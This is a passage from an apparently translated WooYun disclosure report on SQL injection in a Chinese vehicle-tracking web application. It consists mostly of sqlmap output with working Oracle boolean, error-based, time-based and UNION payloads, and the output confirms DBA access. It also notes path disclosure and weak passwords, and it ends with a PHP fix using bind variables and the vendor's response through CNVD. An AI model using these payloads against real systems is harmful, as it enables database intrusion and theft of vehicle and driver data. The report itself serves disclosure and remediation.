HEN (2080=2080) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(121)||CHR
(119)||CHR(113)||CHR(62))) FROM DUAL) AND 'JpCS'='JpCS&sub1=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: day1=2015-09-18&day2=2015-09-19' AND 9230=DBMS_PIPE.RECEIVE_MESSAGE
(CHR(119)||CHR(88)||CHR(104)||CHR(103),5) AND 'qvBw'='qvBw&sub1=%E6%90%9C%E7%B4%
A2
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: day1, type: Single quoted string (default)
[1] place: POST, parameter: day2, type: Single quoted string
[q] Quit
> 0
[23:58:02] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:58:02] [INFO] fetching current user
[23:58:02] [INFO] retrieved: SHMOTO
current user: 'SHMOTO'
[23:58:02] [INFO] fetching current database
[23:58:02] [INFO] resumed: SHMOTO
[23:58:02] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SHMOTO'
[23:58:02] [INFO] testing if current user is DBA
current user is DBA: True


Vehicle alarm data:

**.**.**.**/tongji_alarm.php?cc%5B%5D=9&cc%5B%5D=0&cc%5B%5D=8&day1=2015-09-12&day2=2015-09-19&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2


cc[], day1, day2, company_id and chepaihao are injectable

GET parameter 'chepaihao' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 193 HTTP(s) req
uests:
---
Place: GET
Parameter: chepaihao
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0&chepaihao=2%' AND 7902=7902 AND '%'='&sub1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0&chepaihao=2%' AND 3244=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(1
06)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (3244=3244) THEN 1 ELSE 0
END) FROM DUAL)||CHR(113)||CHR(111)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FRO
M DUAL) AND '%'='&sub1=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0&chepaihao=2%' AND 9308=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(101)||CHR(107)||
CHR(88),5) AND '%'='&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: company_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0' AND 8210=8210 AND 'lrXx'='lrXx&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0' AND 8254=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)
||CHR(112)||CHR(113)||(SELECT (CASE WHEN (8254=8254) THEN 1 ELSE 0 END) FROM DUA
L)||CHR(113)||CHR(111)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND '
cKUq'='cKUq&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19&company_id=197
0' AND 7966=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(122)||CHR(87)||CHR(102),5) A
ND 'XlJT'='XlJT&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: cc[]
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cc[]=9&cc[]=0&cc[]=8) AND 8423=8423 AND (4464=4464&day1=2015-09-12&
day2=2015-09-19&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: cc[]=9&cc[]=0&cc[]=8) AND 7189=(SELECT UPPER(XMLType(CHR(60)||CHR(5
8)||CHR(113)||CHR(106)||CHR(107)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (7189=7
189) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(111)||CHR(101)||CHR(114)||CHR(
113)||CHR(62))) FROM DUAL) AND (9939=9939&day1=2015-09-12&day2=2015-09-19&compan
y_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cc[]=9&cc[]=0&cc[]=8) AND 2096=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||
CHR(119)||CHR(66)||CHR(108),5) AND (4549=4549&day1=2015-09-12&day2=2015-09-19&co
mpany_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: day1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12' AND 5745=5745 AND 'frCg'='frC
g&day2=2015-09-19&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12' AND 3173=(SELECT UPPER(XMLTyp
e(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(112)||CHR(113)||(SELECT (C
ASE WHEN (3173=3173) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(111)||CHR(101)
||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'RzyE'='RzyE&day2=2015-09-19&comp
any_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12' AND 6165=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(85)||CHR(73)||CHR(110)||CHR(65),5) AND 'yOqY'='yOqY&day2=2015-09-19&co
mpany_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: day2
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19' AND 4404=4404
AND 'Cvwl'='Cvwl&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19' AND 9930=(SEL
ECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(112)||CHR(
113)||(SELECT (CASE WHEN (9930=9930) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CH
R(111)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'Oqdi'='Oqdi&comp
any_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: cc[]=9&cc[]=0&cc[]=8&day1=2015-09-12&day2=2015-09-19' AND 2842=DBMS
_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(115)||CHR(121)||CHR(115),5) AND 'jANQ'='jANQ&
company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: cc[], type: Unescaped numeric (default)
[1] place: GET, parameter: day1, type: Single quoted string
[2] place: GET, parameter: day2, type: Single quoted string
[3] place: GET, parameter: company_id, type: Single quoted string
[4] place: GET, parameter: chepaihao, type: Single quoted string
[q] Quit
> 0
[00:02:38] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[00:02:38] [INFO] fetching current user
[00:02:38] [INFO] retrieved: SHMOTO
current user: 'SHMOTO'
[00:02:38] [INFO] fetching current database
[00:02:38] [INFO] resumed: SHMOTO
[00:02:38] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SHMOTO'
[00:02:38] [INFO] testing if current user is DBA
current user is DBA: True


Grouped alarm data: (no data could be retrieved)
Vehicle driving details:

**.**.**.**/tongji_xingshi.php?day=2015-09-19&car_number=2222&sub1=%E6%90%9C%E7%B4%A2


car_number is injectable

GET parameter 'car_number' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 144 HTTP(s) req
uests:
---
Place: GET
Parameter: car_number
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: day=2015-09-19&car_number=2222%' AND 4843=(SELECT UPPER(XMLType(CHR
(60)||CHR(58)||CHR(113)||CHR(111)||CHR(118)||CHR(121)||CHR(113)||(SELECT (CASE W
HEN (4843=4843) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(99)||CHR(
108)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='&sub1=%E6%90%9C%E7%B4%A2
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: day=2015-09-19&car_number=2222%' UNION ALL SELECT NULL,NULL,NULL,NU
LL,NULL,CHR(113)||CHR(111)||CHR(118)||CHR(121)||CHR(113)||CHR(109)||CHR(121)||CH
R(90)||CHR(90)||CHR(113)||CHR(65)||CHR(84)||CHR(66)||CHR(122)||CHR(85)||CHR(113)
||CHR(112)||CHR(99)||CHR(108)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &sub1=%E
6%90%9C%E7%B4%A2
---
[00:05:38] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[00:05:38] [INFO] fetching current user
current user: 'SHMOTO'
[00:05:38] [INFO] fetching current database
[00:05:38] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SHMOTO'
[00:05:38] [INFO] testing if current user is DBA
current user is DBA: True


Unused-vehicle query:

**.**.**.**/tongji_nowork.php?day1=2015-09-14&day2=2015-09-19&company_level=1970&sub1=%E6%90%9C%E7%B4%A2


day1, day2 and company_id are injectable
I stopped testing there!
7. The injection also discloses the filesystem path!

**.**.**.**/device_dt.php?imei=356801031781579&company_id=1970'


As in the screenshot below:

[Screenshot: 注入+路径.jpg (injection plus path disclosure)]


After logging out I could not log in again. Fixed that quickly? I had not even submitted yet; the injection points in the back end are probably still there, though.
It also looks as though credential stuffing is possible; not verified, not fixed!
Although the test account got blocked after too much testing, it is still possible to get in through other users, and they have more vehicles under monitoring than test does!
See the screenshot!

[Screenshot: 登录2.jpg (login)]

Proof of vulnerability:

As above

Fix recommendation:

Fix by filtering the input
Change the weak passwords!
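The "filter the input" fix above, worked through as an added example that is not code from the vehicle-tracking system (its source is not public): a hypothetical reconstruction of the string-building pattern behind device_list_text.php beside a hardened version that uses oci8 bind variables, a whitelist for the cck[] column names, and strict validation of numeric and date parameters. The table name, the $conn handle and the request handling around them are assumptions; the same treatment applies to the cookie-sourced company_id in point 2 and the POST parameters of tongji_mile.php.

```php
<?php
// Added illustration of the "filter" fix; not code from the vehicle-tracking system, whose
// source is not public. The table name (VEHICLE_TABLE) and the oci8 connection $conn are
// assumptions; the parameter and column names are the ones in the report's captured URLs.
define('VEHICLE_TABLE', 'T_VEHICLE_PLACEHOLDER'); // placeholder: real table name unknown

// BEFORE (hypothetical reconstruction): request values are concatenated into the SQL text,
// so a quote inside chepaihao=1%' closes the LIKE literal and the rest runs as SQL. This
// matches the single-quoted-string injection type sqlmap reported for device_list_text.php.
function device_list_vulnerable($conn, array $get)
{
    $sql = "SELECT TCD_CAR_NUMBER, TCD_DRIVER, TCD_DRIVER_MOBILE FROM " . VEHICLE_TABLE
         . " WHERE TCD_CAR_NUMBER LIKE '%" . $get['chepaihao'] . "%'"
         . " AND TCD_DRIVER LIKE '%" . $get['driver'] . "%'"
         . " AND COMPANY_ID = '" . $get['company_level'] . "'";
    $stid = oci_parse($conn, $sql);
    oci_execute($stid); // with display_errors on, an ORA- error here also prints the script path (point 7)
    return $stid;
}

// AFTER: identifiers come from a whitelist, numeric and date inputs are validated up front,
// and every value reaches Oracle through a bind variable, never through the SQL text.
function allowed_columns()
{
    // The cck[] names the client may select; anything else is silently dropped.
    return array('TCD_CAR_NUMBER', 'TCD_CAR_MODEL', 'TCD_DRIVER', 'TCD_DRIVER_MOBILE',
        'TCD_BUYCARTIME', 'TCD_INSUREENDTIME', 'TCD_CHEWEIINFO', 'TCD_CAR_TYPE',
        'TCI_COMPANY_NAME', 'TCH_BIAOSHI', 'DISTRICT_NUM', 'TIME', 'IMEI', 'SIM');
}

// Escape LIKE metacharacters so the user's text matches literally; the ESCAPE '\' clause in
// the query tells Oracle that backslash is the escape character.
function like_literal($value)
{
    return str_replace(array('\\', '%', '_'), array('\\\\', '\\%', '\\_'), (string) $value);
}

// Strict YYYY-MM-DD check for day1/day2, starttime/endtime and similar filters; bind the
// validated string and let Oracle convert it with TO_DATE(:d, 'YYYY-MM-DD').
function valid_ymd($value)
{
    $d = DateTime::createFromFormat('Y-m-d', (string) $value);
    return $d !== false && $d->format('Y-m-d') === (string) $value;
}

function device_list_safe($conn, array $get)
{
    $requested = isset($get['cck']) ? array_filter((array) $get['cck'], 'is_string') : array();
    $cols = array_values(array_intersect($requested, allowed_columns()));
    if (count($cols) === 0) {
        $cols = array('TCD_CAR_NUMBER');
    }
    // company_level is a numeric identifier: reject anything else before it is used.
    if (!isset($get['company_level']) || !ctype_digit((string) $get['company_level'])) {
        return array();
    }
    $company = (int) $get['company_level'];
    $plate   = '%' . like_literal(isset($get['chepaihao']) ? $get['chepaihao'] : '') . '%';
    $driver  = '%' . like_literal(isset($get['driver']) ? $get['driver'] : '') . '%';

    $sql = 'SELECT ' . implode(', ', $cols) . ' FROM ' . VEHICLE_TABLE
         . " WHERE TCD_CAR_NUMBER LIKE :plate ESCAPE '\\'"
         . " AND TCD_DRIVER LIKE :driver ESCAPE '\\'"
         . ' AND COMPANY_ID = :company';
    $stid = oci_parse($conn, $sql);
    oci_bind_by_name($stid, ':plate', $plate);
    oci_bind_by_name($stid, ':driver', $driver);
    oci_bind_by_name($stid, ':company', $company);
    if (!@oci_execute($stid)) {
        // Log server-side only. Never echo oci_error() to the client, and keep
        // display_errors=Off in production so PHP does not print the script path either.
        $err = oci_error($stid);
        error_log('device_list query failed: ' . $err['message']);
        return array();
    }
    $rows = array();
    while (($row = oci_fetch_assoc($stid)) !== false) {
        $rows[] = $row;
    }
    return $rows;
}
```

With bind variables the quote in chepaihao=1%' is just part of the search string, so the boolean, error-based and time-based payloads sqlmap used above all stop working, while the whitelist closes the cck[] identifier path that cannot be bound.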

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-09-24 15:57

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been handed to CNCERT for notification to the Beijing municipal government's information-technology authority, which will coordinate handling with the website's operating unit.

Latest status:

None